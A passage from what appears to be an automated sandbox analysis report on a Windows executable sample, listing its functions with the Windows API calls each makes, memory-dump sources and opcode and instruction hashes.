                      • Part of subcall function 00007FF7E1DCEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E1DCE95F,?,?,?,00007FF7E1DC463A,?,?,?), ref: 00007FF7E1DCEA63
                      • Part of subcall function 00007FF7E1DCEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E1DCE95F,?,?,?,00007FF7E1DC463A,?,?,?), ref: 00007FF7E1DCEA6E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                    • String ID:
                    • API String ID: 2143293610-0
                    • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                    • Instruction ID: e4ffad7eb1e0d9e197a833013551e44412f57d4a5deebbbadd3e4be23caa3c03
                    • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                    • Instruction Fuzzy Hash: A1012D32B14A91A2E758EB21E5457ADA720FB88B80F804132DB5D03625CF79E5F4C792
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Thread$CreatePriority
                    • String ID: CreateThread failed
                    • API String ID: 2610526550-3849766595
                    • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                    • Instruction ID: d5a9222637bef151a5ec8f9d731679fd57a557cc99ee55c96fe080bec1c3936f
                    • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                    • Instruction Fuzzy Hash: 76116331A08A4291EB04EB10E8423BAF365FB84784F944633E68E06669DFBCE595C761
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: DirectoryInitializeMallocSystem
                    • String ID: riched20.dll
                    • API String ID: 174490985-3360196438
                    • Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                    • Instruction ID: 23bf52e3b14848c42912b61a80f0437ce7344dfffdb9b95c3797f2d5cbaffbc4
                    • Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                    • Instruction Fuzzy Hash: 06F03171A18A4182E701EF20F4162AAF3A0FB48755F840136F98D42654DFBCD159CB11
                    APIs
                      • Part of subcall function 00007FF7E1DD853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7E1DD856C
                      • Part of subcall function 00007FF7E1DCAAE0: LoadStringW.USER32 ref: 00007FF7E1DCAB67
                      • Part of subcall function 00007FF7E1DCAAE0: LoadStringW.USER32 ref: 00007FF7E1DCAB80
                      • Part of subcall function 00007FF7E1DB1FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DB1FFB
                      • Part of subcall function 00007FF7E1DB129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E1DB1396
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DE01BB
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DE01C1
                    • SendDlgItemMessageW.USER32 ref: 00007FF7E1DE01F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                    • String ID:
                    • API String ID: 3106221260-0
                    • Opcode ID: 7d1f69911a00d0741de56b49c262a8841e6eb375053cbff927e1aaae2ee712c8
                    • Instruction ID: 5e6ab58f7abd203e2690da29a1e6b5c63b4ce85eab43bee9b2f3df895ab62844
                    • Opcode Fuzzy Hash: 7d1f69911a00d0741de56b49c262a8841e6eb375053cbff927e1aaae2ee712c8
                    • Instruction Fuzzy Hash: 4851C262F0464656EB04EBA5D4423FDA322AB89BC4F804637DE0D977D6DEBCD501C3A1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 2272807158-0
                    • Opcode ID: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
                    • Instruction ID: 60961b6d60840c86b97c30cbad72ddf5e35a8206d4cd44f0944d6508a6e9d53c
                    • Opcode Fuzzy Hash: 4ce248ffffd21e537046429b603db88a9fd2a3d13b10b45fb751dcef003d6319
                    • Instruction Fuzzy Hash: B241C372A0868182EB14EB15E446769A3A1FB84BB4F904736DFAD03AD5CFBCE490C751
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 2176759853-0
                    • Opcode ID: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
                    • Instruction ID: 3393d0600c876580a3b9b4c7231572afae32a823174f3bd028ff53a675559cb0
                    • Opcode Fuzzy Hash: 324ad9725680782466c8b9226039195d64c3332d7d8035b24254b52cca95445d
                    • Instruction Fuzzy Hash: CF21C472A28B8181EB14EB25B84167AA360FB89BD0F544236FBDD03B95CF7CE190C741
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: std::bad_alloc::bad_alloc
                    • String ID:
                    • API String ID: 1875163511-0
                    • Opcode ID: 0ac8b931c67533783bb99e44ed512301af0920adb1b65b15738df05c1e7b1342
                    • Instruction ID: 1b8e3bb6d47d030cc600171588e1d926f1a7eea2d4521f94be93059d6fd9117f
                    • Opcode Fuzzy Hash: 0ac8b931c67533783bb99e44ed512301af0920adb1b65b15738df05c1e7b1342
                    • Instruction Fuzzy Hash: 3931A412E0869651FB24F714E4463B9E3A0FB50784F958133E28C065A9DFFCE986C313
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 1203560049-0
                    • Opcode ID: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
                    • Instruction ID: 0ebba20f80813bc0aaabf9cf53907a5106ed923171e2313a50457d0c948283c9
                    • Opcode Fuzzy Hash: 523e4a483c86c9ac9ee543cf6c476d9bf2e9d6353514affc3e0f4067b8c7bc61
                    • Instruction Fuzzy Hash: 9721FB22A1878141EF20EB29E446369A360FF88794F804232EA9D426D5EF7CD551C651
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3118131910-0
                    • Opcode ID: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
                    • Instruction ID: 4d01bc92fea40e3575509fc920be7510ce8f9fd79bb6ffd313420bdd7ae40092
                    • Opcode Fuzzy Hash: 9e0f12d03b62ccef14e62e4bf3878a3457daa81ed2db8d115c48a0739d4b379d
                    • Instruction Fuzzy Hash: B7212832A1878181EF10EB24F44632EE361FF88B94F900232EADE42A98DF7CD140C751
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 1203560049-0
                    • Opcode ID: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
                    • Instruction ID: 7ce9194d3e0f62e7daca931dc566b1e57284695249690d5b636d49180c57bec8
                    • Opcode Fuzzy Hash: d981565e32c06465bb9ca9e6032df0ff87469bcd01ee0110978b6e45bf249536
                    • Instruction Fuzzy Hash: 4E21B832A1878181EB10EB19F446329E361FBC97A4F900632EA9D437D9DF7CD541CB51
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                    • Instruction ID: 5513b89db6aed866685b87aad4f7c9b74b45baa4db201a8db2caaa55523fcb59
                    • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                    • Instruction Fuzzy Hash: 40E04815F0430546EB58FB715C9737993526F48742F50853AC80E4339ACDBEB5594723
                    APIs
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF895
                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7E1DBF89B
                      • Part of subcall function 00007FF7E1DC3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF7E1DD0811), ref: 00007FF7E1DC3EFD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                    • String ID:
                    • API String ID: 3587649625-0
                    • Opcode ID: c851e9ba04b89524686dcd5c2666f728f32a2a2025563ce38f6b7d0a4701346e
                    • Instruction ID: 623975f9ea95b7e01fdc48bed3325857627062f9f78150b07cec4c54bf5c1373
                    • Opcode Fuzzy Hash: c851e9ba04b89524686dcd5c2666f728f32a2a2025563ce38f6b7d0a4701346e
                    • Instruction Fuzzy Hash: 4191B073A18B91A0EB10EB24D4467EDA361FB84798FD04136EA4D07AE9DFBCD545C321
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: 402f2d810e1efc6a759daaa5297bed4678b331cbcfb426b8061d29b6a9ebee63
                    • Instruction ID: a6b83210f5b9ba3b86e16d53e8cc879052852e5be7e66150f36a63a4a86175c6
                    • Opcode Fuzzy Hash: 402f2d810e1efc6a759daaa5297bed4678b331cbcfb426b8061d29b6a9ebee63
                    • Instruction Fuzzy Hash: F141C422F14651A5FB00EBB5D442BBDA320EF44BD8F945236DE1E27AD9DEB8D482C311
                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF7E1DC274D), ref: 00007FF7E1DC28A9
                    • GetLastError.KERNEL32(?,00007FF7E1DC274D), ref: 00007FF7E1DC28B8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: ErrorFileLastPointer
                    • String ID:
                    • API String ID: 2976181284-0
                    • Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                    • Instruction ID: 0011f2586dfba0939bfc5a1b26885d8c7150dd6aa2a82aee8fe3168b2de08131
                    • Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
                    • Instruction Fuzzy Hash: EF311A22B1995242EF60EB26D542776A350AF84FD4F840533EE1C07794DFBCE581C3A2
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: Item_invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 1746051919-0
                    • Opcode ID: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
                    • Instruction ID: 1f2839a6da272e3e304b02ef559e33ea51a772442b1ab349b278acab60afa07f
                    • Opcode Fuzzy Hash: 8763c555b957396376e96df864685bb2527d49eefc22d4d720e740779d29c564
                    • Instruction Fuzzy Hash: 9731CF22A1974592EB14EB25F4867AAF360EB84B90F804236EA9D07B95DFBCF540C711
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: File$BuffersFlushTime
                    • String ID:
                    • API String ID: 1392018926-0
                    • Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                    • Instruction ID: 81506f770b66cf40f70621d6eb55eee9962957827208a8c6aa7e3396f6d69b56
                    • Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
                    • Instruction Fuzzy Hash: 0721F462F0DB4351EB62EE11D4027BAD791AF81794F944832DE4C02299EEBCD586C352
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7e1db0000_KR6CT3hIxT.jbxd
                    Similarity
                    • API ID: LoadString
                    • String ID:
                    • API String ID: 2948472770-0
                    • Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                    • Instruction ID: c840e9da85db6e83217b9100ba762d3051e65c6513576c814d2036bc31a89906
                    • Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
                    • Instruction Fuzzy Hash: 541181B1B0870185EB00EF16E8412A9F7A1BB94FC1B954976EA4D93720EFBCE541C395
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1732536933.00007FF7E1DB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                    • Associated: 00000000.00000002.1732523657.00007FF7E1DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732563268.00007FF7E1DF8000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732580007.00007FF7E1E14000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1732603744.00007FF7E1E1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
